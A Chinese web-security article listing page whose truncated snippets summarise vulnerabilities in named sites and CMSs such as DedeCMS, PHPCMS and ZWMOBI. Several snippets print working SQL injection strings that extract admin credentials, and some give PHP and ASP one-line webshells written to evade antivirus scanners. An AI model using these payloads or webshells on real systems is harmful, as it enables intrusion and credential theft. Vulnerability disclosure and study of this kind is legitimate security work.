关于xss盲打 - 网站安全 - 自学php关注热度:30

又到了各种年终总结的时候了，先祝各位看官圣诞快乐。我记得有朋友问我在2012年里有没有猥琐流比较出彩的东西时，我给的答案是xss盲打！关于盲打这个词语的出现，最早应该是在..[详情]

拼图秀任意文件删除、本地包含漏洞、重复安装关注热度:22

拼图秀，官网：http://bbs.onightjar.com/早前的挖的洞洞了。刚才试了下百度。发现好多站。都直接就能重复安装了输入下面的地址http://www.2cto.com/ index.php?c=install就能出现安装界面了。我估计..[详情]

TP-LINK官方网上商城储存型XSS一枚 - 网站安全 - 自关注热度:29

TP-LINK官方网上商城储存型XSS一枚无聊来逛逛TP-LINK 看看有木有出新产品网站都看了一边发现该过滤的都过滤了看到那个欢迎 后面的就是我们注册时所写的帐号 不能更改，不知道这个地方..[详情]

寻医问药提问存储型xss一枚 - 网站安全 - 自学p关注热度:14

已经过滤了 script 标签，内容不能出现 网址， 但是稍做处理就轻松绕过了~ 见图注入内容成功在底层页埋下了记录cookie修复方案：过滤！！！htmlspecialchars..[详情]

人人网某分站存储型XSS - 网站安全 - 自学php关注热度:28

过滤不严导致XSS...本来是去找工作的，谁知道顺便挖出来个XSS..-_-开始先测试各种标签..发现过滤器基于白名单，input,img木有过滤...然后发现input type=submit /会侧漏.. 过滤器弱爆了...在这个..[详情]

flash给用户传入执行函数的安全问题 - 网站安全关注热度:20

在html插入一段flash时，由外部传入一个生成后的回调xxx.swf?init=js.initflash里面这样写var HANDLE_INIT:String = getFlashVar(#39;init#39;);......public static function handleInit(arg:*=null):v.....[详情]

eshop v3.9注入漏洞分析 - 网站安全 - 自学php关注热度:23

漏洞文件：informs.asp漏洞代码：ndash; %dim newsidnewsid=request.QueryString(id)set rs=server.CreateObject(adodb.recor.....[详情]

ZWMOBI wap建站系统注入及修复 - 网站安全 - 自学关注热度:18

0Day说明：变量过滤不严，导致MYSQL注入发生。漏洞利用：zwmobi.php?zwmobi=bbsviewV=21cid=12/**/union/**/select/**/1,1,1,1,username,password,1,1,1,1/**/from/**/表前缀_member/**/where/**/uid=1其中uid.....[详情]

揭秘phpwebshell中的后门 - 网站安全 - 自学php关注热度:39

仅将此文献给还在为别人的webshell做出贡献的同学。拿下一个网站后，理所当然的传webshll，提权。但是一些人会在webshell中插入小小的一段代码，这样你辛苦拿下的webshell的地址和密码等..[详情]

关于eval的劫持操作 - 网站安全 - 自学php关注热度:173

前提：本文讨论在chrome浏览器下的情况，由于早期IE浏览器的实现有所不同，导致与本文所提内容存在差异。其它浏览器也未做测试。在某些需求环境中，我们需要劫持eval函数，输出所..[详情]

一次SWF XSS挖掘和利用 - 网站安全 - 自学php关注热度:31

pz大牛写的觉得不错呵呵[ 目录 ][0x00] 背景[0x01] 挖掘漏洞[0x02] 优雅利用[0x03] 从反射到rootkit[0x04] 总结[0x00] 背景这篇迟到了近一年的paper是对WooYun: Gmail某处XSS可导致账号持久劫持漏洞.....[详情]

DedeCMS会员中心头像修改SQL注射漏洞 - 网站安全关注热度:18

DedeCMS会员中心头像修改SQL注射0day漏洞同样需要 magic_quotes_gpc = Off ,成功利用此漏洞可获得管理员密码漏洞参数 oldspacelogo SQL注射http://www.2cto.com /de/member/edit_face.php?dopost=saveol.....[详情]

DedeCMS会员中心空间管理SQL注射0day漏洞 - 网站安全关注热度:19

DedeCMS会员中心空间管理SQL注射0day漏洞,成功利用该漏洞可获得管理员密码.需要能使用引号.危害也不大,直接发漏洞利用代码:漏洞参数 oldspacelogo SQL注射http://www.2cto.com /member/edit_space_info..[详情]

DedeCMS会员中心好友分组设置SQL注射0day漏洞 - 网站关注热度:20

需要magic_quotes_gpc = OffDedeCMS会员中心好友分组设置SQL注射0day漏洞,成功利用该漏洞可获得管理员密码都发出来吧,这种东西也算什么漏洞阿.其实对dedecms来说POST的数据同样可以GET提交,只是..[详情]

DedeCMS会员中心短消息SQL注射0day漏洞 - 网站安全关注热度:20

需要:magic_quotes_gpc = OffDedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码等看到微博上有人提了下,偶也发鸡肋了.http://www.2cto.com /de/member/pm.php?dopost=readid=1%27%20and%20@.....[详情]

PHPCMSV9 201212最新注入漏洞分析(已修复) - 网站安全关注热度:27

之前360爆出\phpcms\modules\poster\index.php 文件poster_click函数注入漏洞，其函数功能是统计广告点击次数。相关链接:http://www.2cto.com/Article/201212/178023.html其实在同一个文件，还有一处注入，在..[详情]

3158.cn妹子密码获取漏洞 - 网站安全 - 自学php关注热度:22

写入自己的油箱就能 收到密码 用户名需要猜解或者暴力 这个也不是难题详细说明：http://anhui.3158.cn/RegfindPassword.action?email=邮箱loginName=用户名测试所有分站都有此洞!显示失败其实发送成..[详情]

eset分站登录框注入以及跨站 - 网站安全 - 自学关注热度:14

参数phone过滤不严，造成注入，以及跨站注入以及跨站地址为 http://jf.eset.com.cn/index.php/user/lookpassphone参数在手机号码处sql:#39; and(select 1 from(select count(*),concat((select (select .....[详情]

绕过D盾Web查杀的脚本木马 - 网站安全 - 自学php关注热度:44

过D盾WEB查杀：%ExecuteGlobal(Request(test))%ExecuteGlobal D盾无提示不提示一句话，只提示Execute：%Execute(Request.Form(test))%%Dim oo=Request(test)Execute o%无耻的办法之一（利用了Exe.....[详情]

HTML5安全攻防详析之七：新标签攻击 - 网站安全关注热度:27

HTML5去掉了很多过时的标签，例如center和frameset，同时又引入了许多有趣的新标签，例如video和audio标签可以允许动态的加载音频和视频。 HTML5引入的新标签包括Audio、Video、Canvas、A.....[详情]

HTML5安全风险详析之六：API攻击 - 网站安全 - 自关注热度:34

HTML5里有许多协议、模式和API，可能成为攻击者的攻击途径。 一、registerProtocolHandler：信息泄漏 HTML5允许某些协议和schema注册为新的特性。例如下面的语句可以注册一个email handler。navi..[详情]

发几个过D盾Web查杀/安全狗/护卫神的PHP免杀一句关注热度:52

大家可以看到上图 只是有一部分被杀最典型最原始的一句话 被杀?php @eval($_POST[#39;k8#39;]);?下面几个都是变种 不被杀?php $k=ass.ert; $k(${_PO.ST} [#39;8#39;]);??$_POST[#39;k.....[详情]

Guru Auction 2.0多重sql注射及修复 - 网站安全 - 自学关注热度:12

Guru Auction 2.0 Multiple SQL Injection Vulnerabilities作者 : v3n0m应用 : Guru Auction 2.0Price : $49Vendor : http://www.guruscript.com/Google Dork : inurl:subcat......[详情]

WordPress Asset-Manager PHP文件上传漏洞及修复 - 网站关注热度:25

这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。..[详情]

DedeCMS会员中心书签管理SQL注射漏洞 - 网站安全关注热度:17

DedeCMS会员中心SQL注射漏洞需要magic_quotes_gpc = Off会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.DedeCMS会员中心书签管理SQL注射漏洞成功利用该漏洞可获得管理员密码会员登..[详情]

C-Panel Cross Site Scripting - 网站安全 - 自学php关注热度:27

CPanel Non Persistent XSSDetails=============Product: CpanelSecurity-Risk: HighRemote-Exploit: yesVendor-URL: http://www.cpanel.netAdvisory-Status: NotPublishedCredits=============Discover.....[详情]

逛网站修改任意账号密码 - 网站安全 - 自学php关注热度:22

注册，登陆，找回密码输入新密码截断http的post数据修改userid为其他帐号的userid，直接f12在网站页面就能看到userid提交修改成功，其他帐号的密码被修改了批量修改危害很大，或者直接看..[详情]

苏宁易购会员中心某验证功能权限设计错误致短关注热度:28

苏宁易购会员中心某功能权限无验证，容易造成权限以外的滥用。1.苏宁易购会员中心，有一个手机验证功能。该功能为了方便会员绑定手机。2.手机绑定，需要先通过邮箱认证，该过程..[详情]

珍品网修改订单任意金额支付 - 网站安全 - 自学关注热度:19

珍品网修改订单任意金额支付，该支付接口应该升级过的吧，但还是能改，订单又未加已支付金额项注册下单，支付，选择拉卡拉支付截断http请求，更改post金额数据提交到拉卡拉支付页..[详情]

丁丁地图各种储存XSS - 网站安全 - 自学php关注热度:17

首先，这网站任何分站，基本都没做过滤，还有论坛啊，什么的等等，等等。http://user.ddmap.com/2597861 你访问一下，看个人资料你懂得。----------------------------------------------------------------..[详情]